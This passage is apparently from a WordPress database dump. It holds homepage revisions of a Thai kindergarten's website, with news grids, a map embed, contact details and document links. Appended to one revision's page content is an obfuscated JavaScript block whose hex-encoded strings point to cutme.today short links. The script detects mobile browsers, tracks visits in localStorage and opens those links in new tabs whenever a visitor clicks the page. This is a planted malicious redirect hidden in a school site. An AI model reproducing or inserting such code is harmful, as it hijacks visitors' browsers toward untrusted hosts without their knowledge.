{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 10:13:32','2024-08-30 03:13:32','',19,'http://watprato.ssk.in.th/?p=300',0,'revision','',0),
(301,2,'2024-08-30 10:15:19','2024-08-30 03:15:19','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 